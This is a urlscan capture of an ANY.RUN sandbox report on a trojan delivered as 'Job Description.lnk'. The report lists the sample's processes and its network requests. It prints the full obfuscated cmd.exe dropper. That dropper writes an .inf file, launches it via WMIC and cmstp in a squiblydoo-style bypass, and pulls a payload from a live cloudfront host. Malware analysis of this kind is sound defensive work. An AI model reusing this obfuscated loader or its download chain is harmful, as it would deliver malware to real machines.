app.any.run
Open in
urlscan Pro
104.22.48.74
Public Scan
Submitted URL: https://t.co/iypca1f5kP
Effective URL: https://app.any.run/tasks/24327b69-4727-4093-8418-3cc8a8080df4/
Submission: On October 03 via api from IN — Scanned from CA
Effective URL: https://app.any.run/tasks/24327b69-4727-4093-8418-3cc8a8080df4/
Submission: On October 03 via api from IN — Scanned from CA
Form analysis 0 forms found in the DOM
Text Content
Created by potrace 1.15, written by Peter Selinger 2001-2017
Interactive malware analysis
New analysis
Reports
TI
Pricing
Contacts
FAQ
Sign In
Move your mouse to view screenshots
Malicious activity
Win7
32 bit
complete
Job Description.lnk
Video Twitter Mail Link
MD5:
d04a0a43777452d0fc85c9c084b165a3
Start:
06.12.2020, 07:20
Total time:
300 s
trojan squiblydoo
Tracker:
Trojan,
Indicators:
Get sample
IOC
MalConf
Restart
Text report
Graph
ATT&CK
Summary beta
Mistral AI is unavailable for non-public reports
Export
JSON Summary HTML document Process Graph (SVG) MISP JSON format All Data (Zip)
CPU
1,31,36,32,26,25,25,27,25,26,26,25,26,25,25,25,25,25,26,26,26,25,25,25,25,25,25,16,3,8,5,5,6,3,3,6,3,7,12,7,9,6,6,9,5,8,6,8,7,13
RAM
15,16,16,17,17,17,17,17,17,17,17,17,17,17,17,17,16,16,16,16,16,16,16,16,16,16,16,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17
Processes
Only important
The report owner subscription doesn't allow to record and view system processes.
Restart the task to view them.
* 2212
cmd.exe
/v /c set "WmGpudG46311=Items" && call set "WmGpudG0604=%WmGpudG46311:~4,1%"
&& (for %b in (c) do @set "WmGpudG51083=%~b") && !WmGpudG0604!et
"WmGpudG9174=na" && !WmGpudG0604!et "WmGpudG1068=a" && !WmGpudG0604!et
"WmGpudG04052=t" && !WmGpudG0604!et "WmGpudG27107=d" && call !WmGpudG0604!et
"WmGpudG0630=%ran!WmGpudG27107!om%.inf" && call !WmGpudG0604!et
"WmGpudG32542=%app!WmGpudG27107!ata%\Micro!WmGpudG0604!oft\!WmGpudG0630!" &&
!WmGpudG0604!et "WmGpudG20252=." && !WmGpudG0604!et "WmGpudG0908="^" && (for
%n in ("[ver!WmGpudG0604!ion]"
"!WmGpudG0604!ig!WmGpudG9174!ture=$Window!WmGpudG0604! NT$"
"[!WmGpudG27107!e!WmGpudG0604!tinationdirs]" "0CA4=01"
"[!WmGpudG27107!efaultin!WmGpudG0604!tall_singleu!WmGpudG0604!er]"
"UnRegis!WmGpudG04052!erOCXs=B653" "!WmGpudG27107!elfiles=0CA4" "[B653]"
"%11%\%WmGpudG12096%crO%WmGpudG82899%j,NI,%WmGpudG7150%%WmGpudG8558%%WmGpudG8558%p%WmGpudG9304%%WmGpudG2088%%WmGpudG2088%ddy7itsuemb9i!WmGpudG20252!cloudfront!WmGpudG20252!%WmGpudG04144%/pwa!WmGpudG20252!bns"
"[0CA4]" "!WmGpudG0630!" "[!WmGpudG0604!!WmGpudG04052!rings]" "WmGpudG8558=t"
"WmGpudG7150=h" "WmGpudG9304=:" "WmGpudG12096=s" "WmGpudG2088=/"
"WmGpudG82899=b" "WmGpudG04144=net" "!WmGpudG0604!ervicen!WmGpudG1068!me=' '"
"!WmGpudG0604!hortsvcn!WmGpudG1068!me=' '") do @e!WmGpudG51083!ho
%~n)>"!WmGpudG32542!"&& !WmGpudG0604!t!WmGpudG1068!rt "" /MIN
wmi!WmGpudG51083! proce!WmGpudG0604!s call !WmGpudG51083!rea!WmGpudG04052!e
"cm!WmGpudG0604!!WmGpudG04052!p /ns /!WmGpudG0604! /su !WmGpudG32542!"
252
6
28
* 3164
WMIC.exe
process call create "cmstp /ns /s /su
C:\Users\admin\AppData\Roaming\Microsoft\14096.inf"
230
7
104
* 3628
WMI
cmstp.exe
/ns /s /su C:\Users\admin\AppData\Roaming\Microsoft\14096.inf
squiblydoo
909
63
198
* 776
WMI
WINWORD.EXE
"C:\Users\admin\AppData\Roaming\Microsoft\30738.doc"
5k
1k
156
* 3508
WMI
regsvr32.exe
/s /n /i "C:\Users\admin\AppData\Roaming\Microsoft\29635.ocx"
262
2
104
* 3048
msxsl.exe
PE
4DB8A6666B9C310946.txt 4DB8A6666B9C310946.txt
977
90
100
* 3084
cmd.exe
/c del "C:\Users\admin\AppData\Roaming\Microsoft\29635.ocx" >> NUL
61
6
24
* 1152
WMI
typeperf.exe
"\System\Processor Queue Length" -si 60 -sc 1
5k
2
38
* 2944
WMI
typeperf.exe
"\System\Processor Queue Length" -si 60 -sc 1
5k
2
38
* 1736
WMI
typeperf.exe
"\System\Processor Queue Length" -si 60 -sc 1
5k
2
19
* Network
* Files
* Debug
* HTTP Requests
4
* Connections
7
* DNS Requests
5
* Threats
4
PCAP
Timeshift
Headers
Rep
PID
Process name
CN
URL
Content
1567 ms
GET 200: OK
3628
cmstp.exe
http://ddy7itsuemb9i.cloudfront.net/pwa.bns
219 Kb
xml
161.29 s
GET 200: OK
3048
msxsl.exe
http://www.w3.org/1999/XSL/Format
30 b
text
161.30 s
GET 200: OK
3048
msxsl.exe
http://s.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGMYDTj7gJd4qdA1oxYY%2BEA%3D
1.71 Kb
der
161.30 s
GET 200: OK
3048
msxsl.exe
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAyO4MkNaokViAQGHuJB%2Ba8%3D
471 b
der
PROCESS | IN PROGRESS
warning
[1736] typeperf.exe
Executed via WMI
Try community version for free!
Register now
WE VALUE YOUR PRIVACY
We use cookies to enhance your browsing experience, serve personalized content
and to analyze our traffic. By clicking "Accept All", you consent to our use of
cookies. Cookie Policy
Accept AllReject All
Customize
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1